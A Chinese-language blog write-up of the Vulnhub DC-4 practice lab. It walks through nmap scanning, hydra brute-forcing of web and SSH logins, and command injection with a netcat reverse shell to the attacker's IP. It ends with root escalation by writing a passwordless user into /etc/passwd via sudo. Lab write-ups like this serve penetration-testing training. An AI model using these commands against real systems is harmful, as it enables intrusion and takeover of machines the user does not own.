Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)

Vulnhub靶场渗透测试系列DC-4(hydra爆破密码的使用)

靶机下载地址：https://www.vulnhub.com/entry/dc-4,313/
将下载好的靶机导入到VMware中，修改其网络模式为NAT模式，然后开启靶机

在kali攻击机进行主机发现，获取靶机的IP地址，使用工具arp-scan或者nmap都可以

注意： 如果发现不了靶机IP，则需要修改靶机的网络设置，参考文章https://blog.csdn.net/qq_45722813/article/details/121324686
发现靶机IP地址为192.168.172.144，现在使用nmap扫描靶机的操作系统和开放端口以及相应的服务，命令nmap -T4 -A -p- 192.168.172.144

靶机操作系统为基于Debian的linux，开放22端口ssh服务，80端口的http服务，服务器容器为nginx1.15.10
现在我们直接在kali即打开浏览器在地址栏输入http://192.168.172.144进行访问

是一个admin的登录界面，其他什么都没有，先试试SQL注入，好像没什么用，然后也没有验证码啥的，我们使用hydra工具进行爆破

得到admin账号的密码为happy，在admin的登录界面进行登录，发现有3个选项可以执行3个不同的命令

所以我们可以抓包进行任意命令执行的攻击，使用burpsuite进行抓包和改包

我们可以更改其命令为反弹shell的命令，现在kali机进行监听

将提交的参数改成nc反弹shell命令radio=nc 192.168.172.131 -e /bin/bash&submit=Run，这里的IP是我kali机的IP

然后点击【Forward】执行命令，可以看到kali机已经连接成功

使用命令python -c "import pty; pty.spawn('/bin/bash')"获取一个交互式shell

现在来一层一层地看各个目录的文件

想进入root目录但是没有权限，所以进入home目录看看，发现3个用户charles，jim和sam

进入各个目录查看，只在jim的目录下发现了一个目录和两个文件，进入backups目录，发现了一个old-passwords.bak文件

使用命令cat old-passwords.bak直接查看文件，然后将文件内容复制到kali机保存问old-passwords.txt文件，用于后面进行密码爆破

然后使用里面的密码对jim用户进行ssh登录爆破，命令hydra -l jim -P old-passwords.txt -t 6 ssh://192.168.172.144

爆破成功，接下来使用用户名jim和密码jibrl04进行ssh登录，我们发现除了问题，提示“192.168.172.144的主机密钥已更改，您已请求严格检查。主机密钥验证失败。”，不慌，我们输入命令ssh-keygen -R "靶机IP"，目的是为了清楚当前机器里关于远程服务器的缓存和密钥信息，然后重新ssh登录即可

打开jim目录下的mbox文件查看，这是一封来自roo的邮件

然后去jim的邮件目录查看，打开/var/mail/jim文件发现了用户Charles的密码
成功切换用户到charles

接下来需要提升权限，首先考虑suid提权，但是好像没有可以利用的命令

然后再考虑sudo提权，发现用户可以不需要输入密码即可以root权限执行teehee命令

teehee命令类似于tee，用于读取标准输入数据，并将其内容输出到文件，所以我们可以使用teehee命令将一个无密码的用户admin写入到/etc/passwd文件中，并将该用户添加到root组中

然后只需要切换到admin用户就是root权限了

最后只需要跳转到/root目录下就可以看到flag文件和内容了

参考文章：http://cn-sec.com/archives/379433.html